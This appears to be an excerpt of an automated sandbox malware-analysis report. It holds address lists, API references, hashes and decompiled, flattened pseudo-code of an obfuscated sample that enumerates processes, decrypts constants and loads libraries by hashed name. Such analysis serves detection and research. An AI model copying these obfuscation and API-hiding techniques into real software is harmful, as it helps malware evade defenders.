                                                                                                                                                        0x012d4da5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4d7c
                                                                                                                                                        0x012d47f7
                                                                                                                                                        0x012d47fd
                                                                                                                                                        0x012d4802
                                                                                                                                                        0x012d4802
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d47f7
                                                                                                                                                        0x012d46ed
                                                                                                                                                        0x012d49ab
                                                                                                                                                        0x012d4e32
                                                                                                                                                        0x012d4e37
                                                                                                                                                        0x012d49b1
                                                                                                                                                        0x012d49b6
                                                                                                                                                        0x012d49bc
                                                                                                                                                        0x012d49c1
                                                                                                                                                        0x012d49c1
                                                                                                                                                        0x012d49b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d49ab
                                                                                                                                                        0x012d46f8
                                                                                                                                                        0x012d4afe
                                                                                                                                                        0x012d4b0d
                                                                                                                                                        0x012d4b12
                                                                                                                                                        0x012d4b17
                                                                                                                                                        0x012d4b1f
                                                                                                                                                        0x012d4b2a
                                                                                                                                                        0x012d4b35
                                                                                                                                                        0x012d4b48
                                                                                                                                                        0x012d4b83
                                                                                                                                                        0x012d4b8c
                                                                                                                                                        0x012d4b91
                                                                                                                                                        0x012d4b96
                                                                                                                                                        0x012d4b9f
                                                                                                                                                        0x012d4bae
                                                                                                                                                        0x012d4bc0
                                                                                                                                                        0x012d4bc8
                                                                                                                                                        0x012d4bda
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4bda
                                                                                                                                                        0x012d4b51
                                                                                                                                                        0x012d4b70
                                                                                                                                                        0x012d4b77
                                                                                                                                                        0x012d4b7a
                                                                                                                                                        0x012d4b7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4b51
                                                                                                                                                        0x012d4703
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4709
                                                                                                                                                        0x012d4709
                                                                                                                                                        0x012d4712
                                                                                                                                                        0x012d4717
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4717
                                                                                                                                                        0x012d4703
                                                                                                                                                        0x012d461c

                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 012D491D
                                                                                                                                                        • Process32First.KERNEL32 ref: 012D4952
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE ref: 012D4A08
                                                                                                                                                        • Process32Next.KERNEL32 ref: 012D4E86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                        • String ID: n;8
                                                                                                                                                        • API String ID: 3243318325-2108076282
                                                                                                                                                        • Opcode ID: fcc6a3db49a038e27a310dbb4d983f34b63867fa87f5d81bbfd4e42c1535ee92
                                                                                                                                                        • Instruction ID: 66decfa0168b7ee17e51465c754f906aa18a81fe1f52952131cfada08a132303
                                                                                                                                                        • Opcode Fuzzy Hash: fcc6a3db49a038e27a310dbb4d983f34b63867fa87f5d81bbfd4e42c1535ee92
                                                                                                                                                        • Instruction Fuzzy Hash: C41213B27287C58AEB74AB19E48072FBB61E3C4744F14442ADB8BDBF59CA79C4418F41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D8D11, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 530libraryCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                        			E012D8D11(signed int __ecx, signed long long __rax, signed long long __rcx, long long __rdx, long long __r8) {
				long long _v72;
				void* _v80;
				signed long long _v88;
				void* _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed long long _v144;
				signed long long _v152;
				void* _v160;
				signed long long _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed char _v244;
				signed long long _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				char _v257;
				signed int _v258;
				char _v259;
				signed char _v260;
				char _v261;
				char _v262;
				char _v263;
				void* _v264;
				char _v265;
				void* _t173;
				void* _t190;
				void* _t227;
				void* _t231;
				void* _t273;
				char _t275;
				void* _t282;
				signed int _t316;
				void* _t320;
				signed long long _t330;
				intOrPtr _t331;
				signed long long _t335;
				signed long long _t336;
				void* _t344;

				_t336 = __rcx;
				_t330 = __rax;
				_t344 =  &_v248;
				_v72 = __r8;
				_v96 = __rdx;
				_t335 = __rcx;
				_v262 =  *__rcx;
				_t173 = 0x61c248a8;
				_v236 = __ecx;
				_v240 = __ecx;
				_v152 = __rcx;
				_v244 = __ecx;
				L1:
				while(_t173 > 0xfcbd0002) {
					if(_t173 <= 0x215b9725) {
						if(_t173 <= 0xd5efc4b) {
							if(_t173 <= 0x6f4d4c6) {
								if(_t173 == 0xfcbd0003) {
									_v176 = _v220 + 1;
									_t330 = _v220;
									 *((char*)(_v72 + _t330)) = _v257;
									r12d = _v164;
									r12d = r12d + 1;
									_t173 = 0xa9df2d97;
								} else {
									if(_t173 == 0x1c29f67) {
										_t173 = 0xe5835167;
										_v184 = _v232;
									}
								}
								continue;
							}
							if(_t173 == 0x6f4d4c7) {
								_t173 = 0x8d13fce2;
								_v240 = _t316;
								_v204 = r13d;
								continue;
							}
							if(_t173 == 0x8d5c7df) {
								_v120 = 0;
								_v116 = 0x5dfb1da7;
								_v112 = 0x7cfe1686;
								_v108 = 0x5ce51497;
								_v104 = 0x6ae10386;
								_v100 = 0xf977191;
								if(_v120 != 0) {
									L95:
									_t316 = 0;
									r8d = 0xa38a7988;
									r9d = 7;
									E012DFAD7(1, _t320, _t330, _t336);
									_t336 = _v144;
									 *_t330();
									_t173 =  ==  ? 0x6f4d4c7 : 0x1c29f67;
									r13d = _v256;
									continue;
								}
								do {
									 *(_t344 + 0xc0 + _t330 * 4) = ( *(_t344 + 0xc0 + _t330 * 4) & 0xaddccd07 |  !( *(_t344 + 0xc0 + _t330 * 4)) & 0x522332f8) ^ 0x5db4431b;
									_t336 = _t336 + 1;
									_t330 = _t330 + 1;
								} while (_t330 != 6);
								goto L95;
							}
							if(_t173 == 0xb078249) {
								_t190 = 0x6f4d4c7;
								_t282 = 0x7bd54888;
								L85:
								_t173 =  ==  ? _t282 : _t190;
								dil = 1;
								r13d = _v248;
							}
							continue;
						}
						if(_t173 > 0x124c494e) {
							if(_t173 == 0x124c494f) {
								_t173 = 0xf3fe694;
								_v180 = _v124;
								continue;
							}
							if(_t173 == 0x1734c08e) {
								_t173 = 0x8f7efe5b;
								bpl = _v258;
								continue;
							}
							if(_t173 != 0x20df8add) {
								continue;
							}
							_v264 = _v263;
							_t227 = 0xdf89bd64;
							_t273 = 0x7d992a6f;
							L68:
							_t173 =  ==  ? _t273 : _t227;
							r14b = _v264;
							continue;
						}
						if(_t173 == 0xd5efc4c) {
							_t173 =  ==  ? 0x859cc583 : 0xaed8082f;
							_v188 = _v252;
							continue;
						}
						if(_t173 == 0xe7a50dd) {
							_t231 = 0xf57e9322;
							L100:
							_t173 =  ==  ? 0xed98fa31 : _t231;
							r15b = 1;
						} else {
							if(_t173 == 0xf3fe694) {
								_t173 = 0xa9df2d97;
								_v176 = 0;
								r12d = _v180;
							}
						}
						continue;
					}
					if(_t173 > 0x4dfd7fdb) {
						if(_t173 > 0x745af0c2) {
							if(_t173 == 0x745af0c3) {
								_v265 = _v262 == 0x22;
								_t173 = 0xf8dbbc04;
								_v196 = 1;
								_v244 = 0;
								continue;
							}
							if(_t173 == 0x7bd54888) {
								_v184 = _v248 + 1;
								_t173 = 0xe5835167;
								continue;
							}
							if(_t173 != 0x7d992a6f) {
								continue;
							}
							_t330 = _v160;
							_t227 = 0xdf89bd64;
							_t273 = 0xe46af3c4;
							goto L68;
						} else {
							if(_t173 == 0x4dfd7fdc) {
								_v200 = _v224 + 1;
								_t173 = 0x215b9726;
							} else {
								if(_t173 == 0x61c248a8) {
									_t173 =  ==  ? 0x80798447 : 0x745af0c3;
								} else {
									if(_t173 == 0x70e76ca6) {
										_t331 = _v224;
										_t275 =  *((char*)(_t335 + _t331));
										_v80 = _t331 + _v88;
										_t330 = _v80;
										 *_t330 = _t275;
										_v228 = _t275;
										_t173 =  >  ? 0x313543e1 : 0x4dfd7fdc;
									}
								}
							}
							continue;
						}
					}
					if(_t173 > 0x313543e0) {
						if(_t173 == 0x313543e1) {
							_t173 =  <  ? 0xe88c13da : 0x4dfd7fdc;
							continue;
						}
						if(_t173 == 0x320e45bc) {
							_t330 = _v160;
							_v172 =  *_t330;
							_t231 = 0xac616ade;
							goto L100;
						}
						if(_t173 == 0x350fae8e) {
							_v196 = _v252 + 1;
							_t173 = 0xf8dbbc04;
							_v244 = _v260;
						}
					} else {
						if(_t173 == 0x215b9726) {
							_v224 = _v200;
							_t173 =  >  ? 0x28d2674c : 0x70e76ca6;
						} else {
							if(_t173 == 0x27c3879a) {
								_v258 = ((_v236 ^ 0x000000fe) & _v236) != 0;
								_v124 = _v192;
								_t173 =  !=  ? 0x124c494f : 0xe1b18e75;
							} else {
								if(_t173 == 0x28d2674c) {
									_v152 = _t330;
									r8d = 0x84161500;
									r9d = 2;
									E012DFAD7(1, _t320, _t330, _t336);
									_t336 = _v88; // executed
									LoadLibraryA(??); // executed
									_v144 = _t330;
									_t173 =  ==  ? 0xeeb4054b : 0xdaf591b5;
								}
							}
						}
					}
				}
				if(_t173 > 0xaed8082e) {
					if(_t173 <= 0xe5835166) {
						if(_t173 <= 0xdf89bd63) {
							if(_t173 == 0xaed8082f) {
								_v256 = _v188;
								_v232 = _v256 + 1;
								_t173 =  !=  ? 0x9551087f : 0x9d776342;
								_v212 = _v232;
								_v216 = 0;
								_v208 = _v256;
							} else {
								if(_t173 == 0xdaf591b5) {
									r8d = 0x5d017afb;
									r9d = 0x32;
									E012DFAD7(1, _t320, _t330, _t336);
									_t336 = _v144;
									r8d = 0x105;
									 *_t330();
									_v152 = _t330;
									_t173 = 0xeeb4054b;
								}
							}
						} else {
							if(_t173 == 0xdf89bd64) {
								_t173 =  ==  ? 0x27c3879a : 0xaa6ad08f;
								_v192 = _v252;
								_v236 = 0;
							} else {
								if(_t173 == 0xe1b18e75) {
									_t330 = _v96;
									 *_t330 = 0;
									_t173 = 0xf3fe694;
									_v180 = 0;
								} else {
									if(_t173 == 0xe46af3c4) {
										_t173 = 0xdf89bd64;
										r14b = 1;
									}
								}
							}
						}
						goto L1;
					}
					if(_t173 > 0xeeb4054a) {
						if(_t173 == 0xeeb4054b) {
							_t173 =  ==  ? 0x6f4d4c7 : 0x8d5c7df;
							r13d = _v256;
							_t316 = 0;
						} else {
							if(_t173 == 0xf57e9322) {
								_t173 =  !=  ? 0xed98fa31 : 0x320e45bc;
								r15d = 0;
							} else {
								if(_t173 == 0xf8dbbc04) {
									_v252 = _v196;
									_v160 = _v252 + _t335;
									_t330 = _v160;
									_v261 =  *_t330;
									_t173 =  ==  ? 0x20df8add : 0x87c5f123;
									_v263 = _v244;
								}
							}
						}
						goto L1;
					}
					if(_t173 == 0xe5835167) {
						_v248 = _v184;
						_t330 = _v248;
						_v259 =  *((intOrPtr*)(_t335 + _t330));
						_t190 = 0xb078249;
						_t282 = 0x6f4d4c7;
						goto L85;
					} else {
						if(_t173 == 0xe88c13da) {
							_t336 = _v80;
							 *_t336 = _v228 + 0x20;
							_t173 = 0x4dfd7fdc;
						} else {
							if(_t173 == 0xed98fa31) {
								_v260 = r15d & 0x00000001;
								_t173 =  !=  ? 0x20df8add : 0x350fae8e;
								_v263 = _v260;
							}
						}
						goto L1;
					}
				}
				if(_t173 <= 0x9551087e) {
					if(_t173 > 0x8d13fce1) {
						if(_t173 == 0x8f7efe5b) {
							bpl = bpl & 0x00000001;
							return 0;
						}
						if(_t173 == 0x8d13fce2) {
							_t173 = 0x27c3879a;
							_v236 = _v240;
							_v192 = _v204;
						}
					} else {
						if(_t173 == 0x80798447) {
							_t173 = 0x8f7efe5b;
						} else {
							if(_t173 == 0x859cc583) {
								_v188 = _v252 - 1;
								_t173 = 0xaed8082f;
							} else {
								if(_t173 == 0x87c5f123) {
									_t173 =  !=  ? 0xe7a50dd : 0xf57e9322;
								}
							}
						}
					}
				} else {
					if(_t173 > 0xa9df2d96) {
						if(_t173 == 0xa9df2d97) {
							_v164 = r12d;
							_v220 = _v176;
							_t330 = _v164;
							_v257 =  *((intOrPtr*)(_t335 + _t330));
							_t204 =  <  ? 0xfcbd0003 : 0x1734c08e;
							_t173 =  ==  ? 0x1734c08e :  <  ? 0xfcbd0003 : 0x1734c08e;
						} else {
							if(_t173 == 0xaa6ad08f) {
								_t330 = _v160;
								_v168 =  *_t330;
								_t173 =  ==  ? 0x859cc583 : 0xd5efc4c;
							} else {
								if(_t173 == 0xac616ade) {
									r15b = _v172 == 0x2c;
									_t173 = 0xed98fa31;
								}
							}
						}
					} else {
						if(_t173 == 0x9551087f) {
							_v208 = _v256 - 1;
							_v212 = _v232 + 0xfffffffe;
							_t173 = 0x9d776342;
							_v216 = 1;
						} else {
							if(_t173 == 0x9d776342) {
								_v132 = _v208;
								_v128 = _v216;
								_t173 =  >  ? 0xa56ad36a : 0x8d13fce2;
								_v204 = _v256;
								_v240 = 0;
							} else {
								if(_t173 == 0xa56ad36a) {
									E012DCDB9(_v256 + 2, _t330);
									_v88 = _t330;
									_t173 = 0x215b9726;
									_v200 = _v128;
								}
							}
						}
					}
				}
			}


































































                                                                                                                                                        0x012d8d11
                                                                                                                                                        0x012d8d11
                                                                                                                                                        0x012d8d1d
                                                                                                                                                        0x012d8d24
                                                                                                                                                        0x012d8d2c
                                                                                                                                                        0x012d8d34
                                                                                                                                                        0x012d8d39
                                                                                                                                                        0x012d8d3d
                                                                                                                                                        0x012d8d42
                                                                                                                                                        0x012d8d46
                                                                                                                                                        0x012d8d4a
                                                                                                                                                        0x012d8d52
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8d56
                                                                                                                                                        0x012d8d66
                                                                                                                                                        0x012d8e61
                                                                                                                                                        0x012d8fbe
                                                                                                                                                        0x012d91ca
                                                                                                                                                        0x012d966a
                                                                                                                                                        0x012d9671
                                                                                                                                                        0x012d9682
                                                                                                                                                        0x012d9685
                                                                                                                                                        0x012d968d
                                                                                                                                                        0x012d9690
                                                                                                                                                        0x012d91d0
                                                                                                                                                        0x012d91d5
                                                                                                                                                        0x012d91db
                                                                                                                                                        0x012d91e4
                                                                                                                                                        0x012d91e4
                                                                                                                                                        0x012d91d5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d91ca
                                                                                                                                                        0x012d8fc9
                                                                                                                                                        0x012d93d7
                                                                                                                                                        0x012d93de
                                                                                                                                                        0x012d93e2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d93e2
                                                                                                                                                        0x012d8fd4
                                                                                                                                                        0x012d93ee
                                                                                                                                                        0x012d93f5
                                                                                                                                                        0x012d9400
                                                                                                                                                        0x012d940b
                                                                                                                                                        0x012d9416
                                                                                                                                                        0x012d9421
                                                                                                                                                        0x012d9433
                                                                                                                                                        0x012d946e
                                                                                                                                                        0x012d9476
                                                                                                                                                        0x012d947f
                                                                                                                                                        0x012d9485
                                                                                                                                                        0x012d948b
                                                                                                                                                        0x012d9490
                                                                                                                                                        0x012d949b
                                                                                                                                                        0x012d94aa
                                                                                                                                                        0x012d94ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d94ad
                                                                                                                                                        0x012d943c
                                                                                                                                                        0x012d945b
                                                                                                                                                        0x012d9462
                                                                                                                                                        0x012d9465
                                                                                                                                                        0x012d9468
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d943c
                                                                                                                                                        0x012d8fdf
                                                                                                                                                        0x012d8feb
                                                                                                                                                        0x012d8ff0
                                                                                                                                                        0x012d9362
                                                                                                                                                        0x012d9362
                                                                                                                                                        0x012d9365
                                                                                                                                                        0x012d9368
                                                                                                                                                        0x012d9368
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8fdf
                                                                                                                                                        0x012d8e6c
                                                                                                                                                        0x012d90ae
                                                                                                                                                        0x012d95c2
                                                                                                                                                        0x012d95ce
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d95ce
                                                                                                                                                        0x012d90b9
                                                                                                                                                        0x012d95da
                                                                                                                                                        0x012d95df
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d95df
                                                                                                                                                        0x012d90c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d90ce
                                                                                                                                                        0x012d90dd
                                                                                                                                                        0x012d90e2
                                                                                                                                                        0x012d9188
                                                                                                                                                        0x012d9188
                                                                                                                                                        0x012d918b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d918b
                                                                                                                                                        0x012d8e77
                                                                                                                                                        0x012d931c
                                                                                                                                                        0x012d9323
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d9323
                                                                                                                                                        0x012d8e82
                                                                                                                                                        0x012d9332
                                                                                                                                                        0x012d953b
                                                                                                                                                        0x012d9540
                                                                                                                                                        0x012d9543
                                                                                                                                                        0x012d8e88
                                                                                                                                                        0x012d8e8d
                                                                                                                                                        0x012d8e93
                                                                                                                                                        0x012d8e98
                                                                                                                                                        0x012d8ea3
                                                                                                                                                        0x012d8ea3
                                                                                                                                                        0x012d8e8d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8e82
                                                                                                                                                        0x012d8d71
                                                                                                                                                        0x012d8f0f
                                                                                                                                                        0x012d9157
                                                                                                                                                        0x012d962a
                                                                                                                                                        0x012d9633
                                                                                                                                                        0x012d9638
                                                                                                                                                        0x012d9640
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d9640
                                                                                                                                                        0x012d9162
                                                                                                                                                        0x012d9653
                                                                                                                                                        0x012d965a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d965a
                                                                                                                                                        0x012d916d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d9173
                                                                                                                                                        0x012d917e
                                                                                                                                                        0x012d9183
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8f15
                                                                                                                                                        0x012d8f1a
                                                                                                                                                        0x012d9392
                                                                                                                                                        0x012d9396
                                                                                                                                                        0x012d8f20
                                                                                                                                                        0x012d8f25
                                                                                                                                                        0x012d93af
                                                                                                                                                        0x012d8f2b
                                                                                                                                                        0x012d8f30
                                                                                                                                                        0x012d8f36
                                                                                                                                                        0x012d8f3b
                                                                                                                                                        0x012d8f47
                                                                                                                                                        0x012d8f4f
                                                                                                                                                        0x012d8f57
                                                                                                                                                        0x012d8f59
                                                                                                                                                        0x012d8f6e
                                                                                                                                                        0x012d8f6e
                                                                                                                                                        0x012d8f30
                                                                                                                                                        0x012d8f25
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8f1a
                                                                                                                                                        0x012d8f0f
                                                                                                                                                        0x012d8d7c
                                                                                                                                                        0x012d9038
                                                                                                                                                        0x012d9512
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d9512
                                                                                                                                                        0x012d9043
                                                                                                                                                        0x012d951a
                                                                                                                                                        0x012d9525
                                                                                                                                                        0x012d9536
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d9536
                                                                                                                                                        0x012d904e
                                                                                                                                                        0x012d905a
                                                                                                                                                        0x012d905e
                                                                                                                                                        0x012d9067
                                                                                                                                                        0x012d9067
                                                                                                                                                        0x012d8d82
                                                                                                                                                        0x012d8d87
                                                                                                                                                        0x012d924f
                                                                                                                                                        0x012d926a
                                                                                                                                                        0x012d8d8d
                                                                                                                                                        0x012d8d92
                                                                                                                                                        0x012d927c
                                                                                                                                                        0x012d9285
                                                                                                                                                        0x012d929c
                                                                                                                                                        0x012d8d98
                                                                                                                                                        0x012d8d9d
                                                                                                                                                        0x012d8da9
                                                                                                                                                        0x012d8db8
                                                                                                                                                        0x012d8dbe
                                                                                                                                                        0x012d8dc4
                                                                                                                                                        0x012d8dc9
                                                                                                                                                        0x012d8dcc
                                                                                                                                                        0x012d8dce
                                                                                                                                                        0x012d8de9
                                                                                                                                                        0x012d8de9
                                                                                                                                                        0x012d8d9d
                                                                                                                                                        0x012d8d92
                                                                                                                                                        0x012d8d87
                                                                                                                                                        0x012d8d7c
                                                                                                                                                        0x012d8df6
                                                                                                                                                        0x012d8eb5
                                                                                                                                                        0x012d8fff
                                                                                                                                                        0x012d91f5
                                                                                                                                                        0x012d969e
                                                                                                                                                        0x012d96a8
                                                                                                                                                        0x012d96bb
                                                                                                                                                        0x012d96c2
                                                                                                                                                        0x012d96c6
                                                                                                                                                        0x012d96d2
                                                                                                                                                        0x012d91fb
                                                                                                                                                        0x012d9200
                                                                                                                                                        0x012d9215
                                                                                                                                                        0x012d921b
                                                                                                                                                        0x012d9221
                                                                                                                                                        0x012d9226
                                                                                                                                                        0x012d9231
                                                                                                                                                        0x012d9237
                                                                                                                                                        0x012d9239
                                                                                                                                                        0x012d9241
                                                                                                                                                        0x012d9241
                                                                                                                                                        0x012d9200
                                                                                                                                                        0x012d9005
                                                                                                                                                        0x012d900a
                                                                                                                                                        0x012d94c9
                                                                                                                                                        0x012d94d0
                                                                                                                                                        0x012d94d4
                                                                                                                                                        0x012d9010
                                                                                                                                                        0x012d9015
                                                                                                                                                        0x012d94e1
                                                                                                                                                        0x012d94e9
                                                                                                                                                        0x012d94ec
                                                                                                                                                        0x012d94f1
                                                                                                                                                        0x012d901b
                                                                                                                                                        0x012d9020
                                                                                                                                                        0x012d9026
                                                                                                                                                        0x012d902b
                                                                                                                                                        0x012d902b
                                                                                                                                                        0x012d9020
                                                                                                                                                        0x012d9015
                                                                                                                                                        0x012d900a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8fff
                                                                                                                                                        0x012d8ec0
                                                                                                                                                        0x012d90f1
                                                                                                                                                        0x012d95fb
                                                                                                                                                        0x012d95fe
                                                                                                                                                        0x012d9603
                                                                                                                                                        0x012d90f7
                                                                                                                                                        0x012d90fc
                                                                                                                                                        0x012d9619
                                                                                                                                                        0x012d961c
                                                                                                                                                        0x012d9102
                                                                                                                                                        0x012d9107
                                                                                                                                                        0x012d9111
                                                                                                                                                        0x012d911d
                                                                                                                                                        0x012d9125
                                                                                                                                                        0x012d912f
                                                                                                                                                        0x012d9142
                                                                                                                                                        0x012d9149
                                                                                                                                                        0x012d9149
                                                                                                                                                        0x012d9107
                                                                                                                                                        0x012d90fc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d90f1
                                                                                                                                                        0x012d8ecb
                                                                                                                                                        0x012d9343
                                                                                                                                                        0x012d9347
                                                                                                                                                        0x012d934f
                                                                                                                                                        0x012d9358
                                                                                                                                                        0x012d935d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8ed1
                                                                                                                                                        0x012d8ed6
                                                                                                                                                        0x012d9378
                                                                                                                                                        0x012d9380
                                                                                                                                                        0x012d9382
                                                                                                                                                        0x012d8edc
                                                                                                                                                        0x012d8ee1
                                                                                                                                                        0x012d8eec
                                                                                                                                                        0x012d8efa
                                                                                                                                                        0x012d8f01
                                                                                                                                                        0x012d8f01
                                                                                                                                                        0x012d8ee1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8ed6
                                                                                                                                                        0x012d8ecb
                                                                                                                                                        0x012d8e01
                                                                                                                                                        0x012d8f7b
                                                                                                                                                        0x012d919a
                                                                                                                                                        0x012d96db
                                                                                                                                                        0x012d96f4
                                                                                                                                                        0x012d96f4
                                                                                                                                                        0x012d91a5
                                                                                                                                                        0x012d91ab
                                                                                                                                                        0x012d91b4
                                                                                                                                                        0x012d91bc
                                                                                                                                                        0x012d91bc
                                                                                                                                                        0x012d8f81
                                                                                                                                                        0x012d8f86
                                                                                                                                                        0x012d93b7
                                                                                                                                                        0x012d8f8c
                                                                                                                                                        0x012d8f91
                                                                                                                                                        0x012d93c9
                                                                                                                                                        0x012d93cd
                                                                                                                                                        0x012d8f97
                                                                                                                                                        0x012d8f9c
                                                                                                                                                        0x012d8fb1
                                                                                                                                                        0x012d8fb1
                                                                                                                                                        0x012d8f9c
                                                                                                                                                        0x012d8f91
                                                                                                                                                        0x012d8f86
                                                                                                                                                        0x012d8e07
                                                                                                                                                        0x012d8e0c
                                                                                                                                                        0x012d9075
                                                                                                                                                        0x012d954b
                                                                                                                                                        0x012d955a
                                                                                                                                                        0x012d955e
                                                                                                                                                        0x012d9569
                                                                                                                                                        0x012d9582
                                                                                                                                                        0x012d958c
                                                                                                                                                        0x012d907b
                                                                                                                                                        0x012d9080
                                                                                                                                                        0x012d9594
                                                                                                                                                        0x012d959f
                                                                                                                                                        0x012d95ba
                                                                                                                                                        0x012d9086
                                                                                                                                                        0x012d908b
                                                                                                                                                        0x012d909b
                                                                                                                                                        0x012d909f
                                                                                                                                                        0x012d909f
                                                                                                                                                        0x012d908b
                                                                                                                                                        0x012d9080
                                                                                                                                                        0x012d8e12
                                                                                                                                                        0x012d8e17
                                                                                                                                                        0x012d92aa
                                                                                                                                                        0x012d92b5
                                                                                                                                                        0x012d92b9
                                                                                                                                                        0x012d92be
                                                                                                                                                        0x012d8e1d
                                                                                                                                                        0x012d8e22
                                                                                                                                                        0x012d92cf
                                                                                                                                                        0x012d92da
                                                                                                                                                        0x012d92f0
                                                                                                                                                        0x012d92f7
                                                                                                                                                        0x012d92fb
                                                                                                                                                        0x012d8e28
                                                                                                                                                        0x012d8e2d
                                                                                                                                                        0x012d8e3a
                                                                                                                                                        0x012d8e3f
                                                                                                                                                        0x012d8e47
                                                                                                                                                        0x012d8e53
                                                                                                                                                        0x012d8e53
                                                                                                                                                        0x012d8e2d
                                                                                                                                                        0x012d8e22
                                                                                                                                                        0x012d8e17
                                                                                                                                                        0x012d8e0c

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: C51$C51$C51
                                                                                                                                                        • API String ID: 1029625771-2991015903
                                                                                                                                                        • Opcode ID: fe5f85f383e8d19b9789314e0c2df6716b5d8d07589ef0cb062c639bb1756b28
                                                                                                                                                        • Instruction ID: 308991a52597e8a2382ea718e4984d12a6453577aeae16b71c935b666d48e206
                                                                                                                                                        • Opcode Fuzzy Hash: fe5f85f383e8d19b9789314e0c2df6716b5d8d07589ef0cb062c639bb1756b28
                                                                                                                                                        • Instruction Fuzzy Hash: 4A22977622C2C18BDB748A2CF48036EBBE1E396744F10445AF7DAC7B69D678C8858F05
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696A4402, Relevance: 3.1, APIs: 2, Instructions: 67memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                                        • Opcode ID: 332f4c8e41c01c45f60c7ddfa1229c256c647090b7dd4978922d75ca5006f502
                                                                                                                                                        • Instruction ID: 3a88c069e18b1af10c2af223f103d60468e902e0d646c81428679b27a09b5f5b
                                                                                                                                                        • Opcode Fuzzy Hash: 332f4c8e41c01c45f60c7ddfa1229c256c647090b7dd4978922d75ca5006f502
                                                                                                                                                        • Instruction Fuzzy Hash: 3711D301B4DB02C9F9614DDA2C606399681DF85BECFA44436EE0DD72B4DDBCE8974302
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

